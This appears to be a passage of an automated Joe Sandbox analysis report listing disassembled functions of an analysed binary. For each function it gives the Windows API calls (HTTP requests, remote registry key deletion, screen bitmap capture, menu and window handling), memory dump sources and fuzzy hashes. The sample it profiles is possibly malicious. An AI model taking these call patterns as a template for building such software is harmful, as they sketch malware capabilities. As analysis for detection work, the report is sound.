                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                                        • API String ID: 2429346358-3619404913
                                                                                                                                                                        • Opcode ID: 3c61320d4d1f1bad4e15ccf70c021c3c6667690fc0f96153ab019d28379d4f8b
                                                                                                                                                                        • Instruction ID: f980362d3dbe334463c258a616585e7395f1f56351693b753901920645ec92a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c61320d4d1f1bad4e15ccf70c021c3c6667690fc0f96153ab019d28379d4f8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 34718870514249AFD721DF18DC48F7AFBE9EB8A380F54042DFA8587261C7B0A966DB11
                                                                                                                                                                        Function 0026146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00261802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00261488,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 00261865
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00261521
                                                                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,0026145A,00000000,?), ref: 002615BB
                                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 002A29B4
                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 002A29E2
                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 002A29F9
                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0026145A,00000000), ref: 002A2A15
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 002A2A27
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                        • String ID: <)3
                                                                                                                                                                        • API String ID: 641708696-698759963
                                                                                                                                                                        • Opcode ID: cf0964b2849598c127df29d43cb1e10d5b7b1d4651708291502e7a22ee726610
                                                                                                                                                                        • Instruction ID: 066905cef25f73e87592dce72fdac0ffc7351ffa88dd37fe8d38659a3ecf5da5
                                                                                                                                                                        • Opcode Fuzzy Hash: cf0964b2849598c127df29d43cb1e10d5b7b1d4651708291502e7a22ee726610
                                                                                                                                                                        • Instruction Fuzzy Hash: 63613931521712DFDB269F18D988B2AB7B6FB81322F588518E44397660CB74B8B4DB40
                                                                                                                                                                        Function 002DCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002DCEF5
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002DCF08
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002DCF1C
                                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002DCF35
                                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 002DCF78
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002DCF8E
                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002DCF99
                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002DCFC9
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 002DD021
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 002DD035
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002DD040
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3800310941-3916222277
                                                                                                                                                                        • Opcode ID: f24d7bf89f079dc394115dc1a857f6a2515a011a54efdac9d4e0543b3d301633
                                                                                                                                                                        • Instruction ID: 2f301a7c220bc27a968e15c80723e1c996f40770f3c1600b99b4da7404ba7bfa
                                                                                                                                                                        • Opcode Fuzzy Hash: f24d7bf89f079dc394115dc1a857f6a2515a011a54efdac9d4e0543b3d301633
                                                                                                                                                                        • Instruction Fuzzy Hash: B7519BB1510606BFDB219F60DC88ABBBBBDFF48395F10842AF94586250D734ED15EBA0
                                                                                                                                                                        Function 002F8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002F66D6,?,?), ref: 002F8FEE
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F8FFE
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9009
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9016
                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 002F9024
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9033
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 002F903C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9043
                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002F66D6,?,?,00000000,?), ref: 002F9054
                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00300C04,?), ref: 002F906D
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 002F907D
                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 002F909D
                                                                                                                                                                        • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002F90CD
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 002F90F5
                                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002F910B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                                                        • Opcode ID: 9a70c4939f26522333ea99db94d4af161bf18b0b88ecda12d512f10335a03b28
                                                                                                                                                                        • Instruction ID: 3af2bc4154bac468eb16e88fb988258e0a4e3bd25b7b9026cd51841718878205
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a70c4939f26522333ea99db94d4af161bf18b0b88ecda12d512f10335a03b28
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C413A75600209BFDB119F65EC4CEBBBBB9EF897A1F104068FA05D7260DB709941DB60
                                                                                                                                                                        Function 002EC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
                                                                                                                                                                          • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC154
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002EC1D2
                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 002EC26A
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002EC2DE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002EC2FC
                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 002EC352
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002EC364
                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 002EC382
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 002EC3E3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002EC3F4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                                                                        • Opcode ID: 69b582b7680075a2076199c7f2e14c8afc7499ed9a1fe67e863900ea95445fba
                                                                                                                                                                        • Instruction ID: 3d4b3f6ca4ace78e22b907ed0d54bf7e12843327270776b202d257ad000bed60
                                                                                                                                                                        • Opcode Fuzzy Hash: 69b582b7680075a2076199c7f2e14c8afc7499ed9a1fe67e863900ea95445fba
                                                                                                                                                                        • Instruction Fuzzy Hash: BBC19E34224242AFD710DF55C494F2ABBE5BF84318F64849CF45A8B6A2CB71EC96CF91
                                                                                                                                                                        Function 002FA94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 002FA990
                                                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 002FA9A7
                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002FA9B3
                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 002FA9C9
                                                                                                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 002FAC15
                                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002FAC33
                                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002FAC54
                                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 002FAC73
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 002FAC95
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 002FACBB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                        • String ID: @$(3
                                                                                                                                                                        • API String ID: 3962739598-2244231450
                                                                                                                                                                        • Opcode ID: 7e375753332e232e200c483029c34b0ab94af22cfbf1cd537f2eff4bd1212f6b
                                                                                                                                                                        • Instruction ID: aff5dc1793e4c3b198f0dfc726a883721da7da1b600345fdb73bfbcaf9ad6ff8
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e375753332e232e200c483029c34b0ab94af22cfbf1cd537f2eff4bd1212f6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3AB1ADB450021ADFCF14CF68C9857BEBBB2BF44744F14807AEE499B295D770A9A0CB51
                                                                                                                                                                        Function 002F976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002F97B6
                                                                                                                                                                        • GetFocus.USER32 ref: 002F97C6
                                                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 002F97D1
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 002F9879
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002F992B
                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 002F9948
                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 002F9958
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002F998A
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002F99CC
                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002F99FD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                        • String ID: 0$(3
                                                                                                                                                                        • API String ID: 1026556194-1772917041
                                                                                                                                                                        • Opcode ID: 51088dc1946fa676b6c54cd2831d65a821b80161b059ceeffddd26f97a7bfbc3
                                                                                                                                                                        • Instruction ID: e0143212599b7f1abc0dcedb91ad2edd0c34e0948ed04e9fb5986e5466c184cc
                                                                                                                                                                        • Opcode Fuzzy Hash: 51088dc1946fa676b6c54cd2831d65a821b80161b059ceeffddd26f97a7bfbc3
                                                                                                                                                                        • Instruction Fuzzy Hash: 5B81E17051430A9FD710CF25D884B7BBBE8FB88394F00092DFA8597291CB70D995CBA2
                                                                                                                                                                        Function 002E2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002E3035
                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002E3045
                                                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 002E3051
                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 002E305E
                                                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002E30CA
                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002E3109
                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002E312D
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 002E3135
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 002E313E
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 002E3145
                                                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 002E3150
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                        • String ID: (
                                                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                                                        • Opcode ID: 6befdaa720bb27d62589c57e95cadbb30ea23505d7ac92c0b5fbe3d6f40dc70f
                                                                                                                                                                        • Instruction ID: 354311eabf5f87c780808f6815310f9ed96cdd592b4617ded3e63b8d551ec84b
                                                                                                                                                                        • Opcode Fuzzy Hash: 6befdaa720bb27d62589c57e95cadbb30ea23505d7ac92c0b5fbe3d6f40dc70f
                                                                                                                                                                        • Instruction Fuzzy Hash: 0161E2B5D10219EFCF05CFA4D888EAEBBB6FF48310F208529E559A7250D771AA51CF90
                                                                                                                                                                        Function 002C52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 002C52E6
                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 002C5328
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002C5339
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 002C5345
                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 002C537A
                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002C53B2
                                                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 002C53EB
                                                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002C5445
                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 002C5477
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002C54EF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                        • String ID: ThumbnailClass
                                                                                                                                                                        • API String ID: 1311036022-1241985126
                                                                                                                                                                        • Opcode ID: a540c6cead875adb176e0480cad8100d9dd365cf32bd1d9933b0c8aa585ceee4
                                                                                                                                                                        • Instruction ID: 8d77f7405597a0b3d11c89b00515c6c315f74dbc659dbd38d28db3f3fe1f6520
                                                                                                                                                                        • Opcode Fuzzy Hash: a540c6cead875adb176e0480cad8100d9dd365cf32bd1d9933b0c8aa585ceee4
                                                                                                                                                                        • Instruction Fuzzy Hash: C091D371124A17AFD718DF24D894FAAB7A9FF40344F40462DFA8682091EB31FDA5CB91
                                                                                                                                                                        Function 002CC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenuItemInfoW.USER32(003329C0,000000FF,00000000,00000030), ref: 002CC973
                                                                                                                                                                        • SetMenuItemInfoW.USER32(003329C0,00000004,00000000,00000030), ref: 002CC9A8
                                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 002CC9BA
                                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 002CCA00
                                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 002CCA1D
                                                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 002CCA49
                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 002CCA90
                                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002CCAD6
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002CCAEB
                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002CCB0C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1460738036-4108050209
                                                                                                                                                                        • Opcode ID: 7f651682d037bc8ea14055f7279446ffee7b8b5d82bb8da828562f3bd45e1980
                                                                                                                                                                        • Instruction ID: f18e769c5a2bf206f17a09ebc41f3b0da442cd1ad9256995c2c048c94a39c8d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f651682d037bc8ea14055f7279446ffee7b8b5d82bb8da828562f3bd45e1980
                                                                                                                                                                        • Instruction Fuzzy Hash: 44618F7092024AAFDF11CFA4DC89FBE7BA9FB05358F240259E819A3251D771AD25CB60
                                                                                                                                                                        Function 002CE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002CE4D4
                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002CE4FA
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CE504
                                                                                                                                                                        • _wcsstr.LIBVCRUNTIME ref: 002CE554
                                                                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002CE570
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
